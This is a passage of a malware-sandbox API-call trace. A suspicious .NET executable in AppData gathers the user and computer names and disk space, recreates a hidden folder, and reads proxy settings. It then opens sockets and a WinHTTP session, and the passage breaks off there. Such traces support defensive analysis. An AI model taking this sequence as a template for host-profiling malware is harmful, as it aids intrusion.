returned 0 [0223.493] CryptDestroyKey (hKey=0x758e60) returned 1 [0223.493] CryptReleaseContext (hProv=0x7aada0, dwFlags=0x0) returned 1 [0223.493] CryptReleaseContext (hProv=0x7aada0, dwFlags=0x0) returned 1 [0223.521] CoTaskMemAlloc (cb=0x20c) returned 0x4b775d8 [0223.521] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x4b775d8 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Local") returned 0x0 [0223.523] CoTaskMemFree (pv=0x4b775d8) [0223.525] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x189d58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local", lpFilePart=0x0) returned 0x1f [0223.572] GetUserNameW (in: lpBuffer=0x18a060, pcbBuffer=0x18a2d8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18a2d8) returned 1 [0223.574] GetComputerNameW (in: lpBuffer=0x18a060, nSize=0x18a2d8 | out: lpBuffer="YKYD69Q", nSize=0x18a2d8) returned 1 [0223.576] CoTaskMemAlloc (cb=0x20c) returned 0x7adf10 [0223.576] GetSystemDirectoryW (in: lpBuffer=0x7adf10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0223.577] CoTaskMemFree (pv=0x7adf10) [0223.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x189d40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0223.583] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x189d44, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0223.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a294) returned 1 [0223.585] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x18a2c0, lpTotalNumberOfBytes=0x18a2b8, lpTotalNumberOfFreeBytes=0x18a2b0 | out: lpFreeBytesAvailableToCaller=0x18a2c0, lpTotalNumberOfBytes=0x18a2b8, lpTotalNumberOfFreeBytes=0x18a2b0) returned 1 [0223.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a290) returned 1 [0223.814] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", nBufferLength=0x105, lpBuffer=0x189ea8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933", lpFilePart=0x0) returned 0x2a [0223.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a284) returned 1 [0223.815] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x272dcb0 | out: lpFileInformation=0x272dcb0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99dd4680, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0x99dd4680, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0x99dd4680, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0223.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a280) returned 1 [0223.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a250) returned 1 [0223.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x18a2d0 | out: lpFileInformation=0x18a2d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99dd4680, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0x99dd4680, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0x99dd4680, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0223.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a24c) returned 1 [0223.828] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933\\*", lpFindFileData=0x189fa4 | out: lpFindFileData=0x189fa4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99dd4680, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0x99dd4680, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0x99dd4680, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4b818f0 [0223.829] FindNextFileW (in: hFindFile=0x4b818f0, lpFindFileData=0x189fb8 | out: lpFindFileData=0x189fb8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99dd4680, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0x99dd4680, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0x99dd4680, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0223.830] FindNextFileW (in: hFindFile=0x4b818f0, lpFindFileData=0x189fb8 | out: lpFindFileData=0x189fb8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99dd4680, ftCreationTime.dwHighDateTime=0x1d66ab6, ftLastAccessTime.dwLowDateTime=0x99dd4680, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0x99dd4680, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0223.831] FindClose (in: hFindFile=0x4b818f0 | out: hFindFile=0x4b818f0) returned 1 [0223.831] RemoveDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933")) returned 1 [0223.833] SleepEx (dwMilliseconds=0x7d0, bAlertable=1) returned 0x0 [0225.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a1f0) returned 1 [0225.840] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x18a26c | out: lpFileInformation=0x18a26c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0225.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a1ec) returned 1 [0225.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a1f0) returned 1 [0225.841] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), fInfoLevelId=0x0, lpFileInformation=0x18a26c | out: lpFileInformation=0x18a26c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0225.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a1ec) returned 1 [0225.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x18a1f0) returned 1 [0225.841] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local" (normalized: "c:\\users\\aetadzjz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x18a26c | out: lpFileInformation=0x18a26c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x23383600, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xe4696990, ftLastAccessTime.dwHighDateTime=0x1d66ab6, ftLastWriteTime.dwLowDateTime=0xe4696990, ftLastWriteTime.dwHighDateTime=0x1d66ab6, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x18a1ec) returned 1 [0225.843] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Local\\A8D24E6933" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\a8d24e6933"), lpSecurityAttributes=0x0) returned 1 [0225.864] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0227.087] GetTimeZoneInformation (in: lpTimeZoneInformation=0x1889a4 | out: lpTimeZoneInformation=0x1889a4) returned 0x0 [0227.280] GetUserNameW (in: lpBuffer=0x189f88, pcbBuffer=0x18a200 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18a200) returned 1 [0227.389] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config", nBufferLength=0x105, lpBuffer=0x189b24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config", lpFilePart=0x0) returned 0x40 [0227.406] GetCurrentProcess () returned 0xffffffff [0227.407] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189ecc | out: TokenHandle=0x189ecc*=0x224) returned 1 [0227.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x1899ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0227.411] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x189ecc | out: lpFileInformation=0x189ecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92785300, ftCreationTime.dwHighDateTime=0x1cd5d48, ftLastAccessTime.dwLowDateTime=0x346650f0, ftLastAccessTime.dwHighDateTime=0x1d2f186, ftLastWriteTime.dwLowDateTime=0x92785300, ftLastWriteTime.dwHighDateTime=0x1cd5d48, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0227.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x189978, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0227.415] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x189ecc | out: lpFileInformation=0x189ecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92785300, ftCreationTime.dwHighDateTime=0x1cd5d48, ftLastAccessTime.dwLowDateTime=0x346650f0, ftLastAccessTime.dwHighDateTime=0x1d2f186, ftLastWriteTime.dwLowDateTime=0x92785300, ftLastWriteTime.dwHighDateTime=0x1cd5d48, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0227.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x189904, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0227.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x189df8) returned 1 [0227.416] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x228 [0227.416] GetFileType (hFile=0x228) returned 0x1 [0227.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x189df4) returned 1 [0227.416] GetFileType (hFile=0x228) returned 0x1 [0227.434] GetFileSize (in: hFile=0x228, lpFileSizeHigh=0x189ec0 | out: lpFileSizeHigh=0x189ec0*=0x0) returned 0x8c8f [0227.434] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189e7c, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189e7c*=0x1000, lpOverlapped=0x0) returned 1 [0227.448] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189d18, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189d18*=0x1000, lpOverlapped=0x0) returned 1 [0227.453] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189bcc, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189bcc*=0x1000, lpOverlapped=0x0) returned 1 [0227.454] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189bcc, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189bcc*=0x1000, lpOverlapped=0x0) returned 1 [0227.454] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189bcc, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189bcc*=0x1000, lpOverlapped=0x0) returned 1 [0227.454] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189b04, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189b04*=0x1000, lpOverlapped=0x0) returned 1 [0227.458] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189c80, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189c80*=0x1000, lpOverlapped=0x0) returned 1 [0227.459] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189b94, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189b94*=0x1000, lpOverlapped=0x0) returned 1 [0227.459] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189b94, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189b94*=0xc8f, lpOverlapped=0x0) returned 1 [0227.459] ReadFile (in: hFile=0x228, lpBuffer=0x2735fa8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x189c54, lpOverlapped=0x0 | out: lpBuffer=0x2735fa8*, lpNumberOfBytesRead=0x189c54*=0x0, lpOverlapped=0x0) returned 1 [0227.460] CloseHandle (hObject=0x228) returned 1 [0227.461] GetCurrentProcess () returned 0xffffffff [0227.461] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a000 | out: TokenHandle=0x18a000*=0x228) returned 1 [0227.461] GetCurrentProcess () returned 0xffffffff [0227.461] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a000 | out: TokenHandle=0x18a000*=0x22c) returned 1 [0227.462] GetCurrentProcess () returned 0xffffffff [0227.462] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189ecc | out: TokenHandle=0x189ecc*=0x230) returned 1 [0227.462] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x189ecc | out: lpFileInformation=0x189ecc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.462] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config", nBufferLength=0x105, lpBuffer=0x189978, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config", lpFilePart=0x0) returned 0x40 [0227.462] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\appdata\\sjfhjjskfsf.exe.config" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\appdata\\sjfhjjskfsf.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x189ecc | out: lpFileInformation=0x189ecc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.463] GetCurrentProcess () returned 0xffffffff [0227.463] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a000 | out: TokenHandle=0x18a000*=0x234) returned 1 [0227.463] GetCurrentProcess () returned 0xffffffff [0227.463] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a000 | out: TokenHandle=0x18a000*=0x238) returned 1 [0227.476] GetCurrentProcess () returned 0xffffffff [0227.476] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189dc8 | out: TokenHandle=0x189dc8*=0x23c) returned 1 [0227.485] GetCurrentProcess () returned 0xffffffff [0227.485] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189dd8 | out: TokenHandle=0x189dd8*=0x240) returned 1 [0227.520] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x244 [0227.520] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x248 [0227.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x1892fc | out: phkResult=0x1892fc*=0x24c) returned 0x0 [0227.529] RegQueryValueExW (in: hKey=0x24c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x18931c, lpData=0x0, lpcbData=0x189318*=0x0 | out: lpType=0x18931c*=0x1, lpData=0x0, lpcbData=0x189318*=0xe) returned 0x0 [0227.529] RegQueryValueExW (in: hKey=0x24c, lpValueName="InstallationType", lpReserved=0x0, lpType=0x18931c, lpData=0x275211c, lpcbData=0x189318*=0xe | out: lpType=0x18931c*=0x1, lpData="Client", lpcbData=0x189318*=0xe) returned 0x0 [0227.530] RegCloseKey (hKey=0x24c) returned 0x0 [0227.548] GetCurrentProcess () returned 0xffffffff [0227.549] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x188f08 | out: TokenHandle=0x188f08*=0x24c) returned 1 [0227.562] GetCurrentProcess () returned 0xffffffff [0227.562] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x188f18 | out: TokenHandle=0x188f18*=0x250) returned 1 [0227.571] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x188be0 | out: phkResult=0x188be0*=0x0) returned 0x2 [0227.576] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a0f8 | out: phkResult=0x18a0f8*=0x254) returned 0x0 [0227.576] RegQueryValueExW (in: hKey=0x254, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0x18a114, lpData=0x0, lpcbData=0x18a110*=0x0 | out: lpType=0x18a114*=0x0, lpData=0x0, lpcbData=0x18a110*=0x0) returned 0x2 [0227.576] RegCloseKey (hKey=0x254) returned 0x0 [0227.592] GetCurrentProcess () returned 0xffffffff [0227.592] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d6c | out: TokenHandle=0x189d6c*=0x254) returned 1 [0227.595] GetCurrentProcess () returned 0xffffffff [0227.595] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d7c | out: TokenHandle=0x189d7c*=0x258) returned 1 [0227.598] QueryPerformanceFrequency (in: lpFrequency=0x3f8978 | out: lpFrequency=0x3f8978*=100000000) returned 1 [0227.603] GetCurrentProcess () returned 0xffffffff [0227.603] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d4c | out: TokenHandle=0x189d4c*=0x25c) returned 1 [0227.605] GetCurrentProcess () returned 0xffffffff [0227.605] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x189d5c | out: TokenHandle=0x189d5c*=0x260) returned 1 [0227.608] GetCurrentProcess () returned 0xffffffff [0227.608] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a068 | out: TokenHandle=0x18a068*=0x264) returned 1 [0227.668] CoTaskMemAlloc (cb=0xcc0) returned 0x7b66e8 [0227.669] RasEnumConnectionsW (in: param_1=0x7b66e8, param_2=0x18a078, param_3=0x18a07c | out: param_1=0x7b66e8, param_2=0x18a078, param_3=0x18a07c) returned 0x0 [0227.680] CoTaskMemFree (pv=0x7b66e8) [0227.685] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x189e60 | out: lpWSAData=0x189e60) returned 0 [0227.693] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x2a8 [0227.714] setsockopt (s=0x2a8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0227.714] closesocket (s=0x2a8) returned 0 [0227.714] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x2a8 [0227.720] setsockopt (s=0x2a8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0227.720] closesocket (s=0x2a8) returned 0 [0227.721] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2a8 [0227.721] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ac [0227.722] ioctlsocket (in: s=0x2a8, cmd=-2147195266, argp=0x18a080 | out: argp=0x18a080) returned 0 [0227.722] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2b0 [0227.722] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2b4 [0227.723] ioctlsocket (in: s=0x2b0, cmd=-2147195266, argp=0x18a080 | out: argp=0x18a080) returned 0 [0227.723] WSAIoctl (in: s=0x2a8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18a068, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18a068, lpOverlapped=0x0) returned -1 [0227.726] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x189d98, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0227.742] WSAEventSelect (s=0x2a8, hEventObject=0x2ac, lNetworkEvents=512) returned 0 [0227.742] WSAIoctl (in: s=0x2b0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x18a068, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x18a068, lpOverlapped=0x0) returned -1 [0227.742] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x189d98, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0227.743] WSAEventSelect (s=0x2b0, hEventObject=0x2b4, lNetworkEvents=512) returned 0 [0227.743] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2bc [0227.743] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x2bc, param_3=0x3) returned 0x0 [0227.747] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x18a094 | out: phkResult=0x18a094*=0x2d4) returned 0x0 [0227.748] RegOpenKeyExW (in: hKey=0x2d4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a044 | out: phkResult=0x18a044*=0x2d8) returned 0x0 [0227.748] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2dc [0227.748] RegNotifyChangeKeyValue (hKey=0x2d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2dc, fAsynchronous=1) returned 0x0 [0227.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a048 | out: phkResult=0x18a048*=0x2e0) returned 0x0 [0227.749] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2e4 [0227.749] RegNotifyChangeKeyValue (hKey=0x2e0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2e4, fAsynchronous=1) returned 0x0 [0227.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x18a048 | out: phkResult=0x18a048*=0x2e8) returned 0x0 [0227.749] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2ec [0227.750] RegNotifyChangeKeyValue (hKey=0x2e8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x2ec, fAsynchronous=1) returned 0x0 [0227.750] GetCurrentProcess () returned 0xffffffff [0227.750] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18a03c | out: TokenHandle=0x18a03c*=0x2f0) returned 1 [0227.753] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x189948 | out: phkResult=0x189948*=0x2f4) returned 0x0 [0227.754] RegQueryValueExW (in: hKey=0x2f4, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x189964, lpData=0x0, lpcbData=0x189960*=0x0 | out: lpType=0x189964*=0x0, lpData=0x0, lpcbData=0x189960*=0x0) returned 0x2 [0227.754] RegCloseKey (hKey=0x2f4) returned 0x0 [0227.791] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x7b7278 [0227.807] WinHttpSetTimeouts 